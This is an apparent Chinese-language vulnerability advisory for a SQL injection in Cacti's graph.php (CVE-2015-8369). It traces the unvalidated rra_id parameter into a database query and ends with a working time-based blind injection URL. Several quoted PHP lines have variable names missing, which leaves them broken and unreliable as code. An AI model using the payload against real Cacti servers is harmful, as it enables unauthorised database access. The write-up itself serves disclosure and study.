### 0x01 漏洞简述
Cacti是Cacti集团的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。
Cacti 0.8.8f以前版本存在SQL注入漏洞。允许远程攻击者通过graphphp属性行动中的rra_id参数执行任意SQL命令。
### 0x02 漏洞细节
漏洞存在于文件
/cacti-0.8.8f/graph.php
line 25
```
include_once("./include/top_graph_header.php");
/* set default action */
if (!isset(["action"])) { ["action"] = "view"; }
if (!isset(["view_type"])) { ["view_type"] = ""; }
= true;
include("./include/auth.php");
include_once("./lib/rrd.php");
api_plugin_hook_function('graph');
include_once("./lib/html_tree.php");
include_once("./include/top_graph_header.php");
/* ================= input validation ================= */
input_validate_input_regex(get_request_var("rra_id"), "^([0-9]+|all)$");
input_validate_input_number(get_request_var("local_graph_id"));
input_validate_input_number(get_request_var("graph_end"));
input_validate_input_number(get_request_var("graph_start"));
input_validate_input_regex(get_request_var_request("view_type"), "^([a-zA-Z0-9]+)$");
/* ==================================================== */
```
/cacti-0.8.8f/include/top_graph_header.php
line 30 rra_id 参数未验证
```
/* ================= input validation ================= */
input_validate_input_number(get_request_var_request("local_graph_id"));
input_validate_input_number(get_request_var_request("graph_start"));
input_validate_input_number(get_request_var_request("graph_end"));
/* ==================================================== */
```
继续跟踪
line 158
<?php if ((basename($_SERVER["PHP_SELF"]) == "graph.php") && ($_REQUEST["action"] == "properties")) {?>
<tr>
<td valign="top" class='cactiTreeNavigationArea' colspan="3">
<?php
$graph_data_array["print_source"] = true;
/* override: graph start time (unix time) */
if (!empty($_GET["graph_start"])) {
$graph_data_array["graph_start"] = get_request_var_request("graph_start");
}
/* override: graph end time (unix time) */
if (!empty($_GET["graph_end"])) {
$graph_data_array["graph_end"] = get_request_var_request("graph_end");
}
print trim(@rrdtool_function_graph(get_request_var_request("local_graph_id"), get_request_var_request("rra_id"), $graph_data_array));
?>
\cacti-0.8.8f\lib\rrd.php function rrdtool_function_graph line 631
$rra["timespan"] = 86400;
}else{
/* get a list of RRAs related to this graph */
$rras = get_associated_rras($local_graph_id);
if (sizeof($rras) > 0) {
foreach ($rras as $unchosen_rra) {
/* the timespan specified in the RRA "timespan" field may not be accurate */
$real_timespan = ($ds_step * $unchosen_rra["steps"] * $unchosen_rra["rows"]);
/* make sure the current start/end times fit within each RRA's timespan */
if ( (($graph_data_array["graph_end"] - $graph_data_array["graph_start"]) <= $real_timespan) && ((time() - $graph_data_array["graph_start"]) <= $real_timespan) ) {
/* is this RRA better than the already chosen one? */
if ((isset($rra)) && ($unchosen_rra["steps"] < $rra["steps"])) {
$rra = $unchosen_rra;
}else if (!isset($rra)) {
$rra = $unchosen_rra;
}
}
}
}
if (!isset($rra)) {
$rra["rows"] = 600;
$rra["steps"] = 1;
}
}
}else{
// sql injection here
$rra = db_fetch_row("select timespan,rows,steps from rra where id=$rra_id");
}
利用方式:
```
http://192.168.x.x/cacti/graph.php?action=properties&local_graph_id=1&rra_id=1%20and%20benchmark(20000000%2csha1(1))--%20&view_type=&graph_start=1448274676&graph_end=1448360776
```
### 0x03 参考链接
FULLDISC:20151209 [CVE-2015-8369] Cacti SQL injection in graph.php
URL:http://seclists.org/fulldisclosure/2015/Dec/8
MISC:http://bugs.cacti.net/view.php?id=2646
暂无评论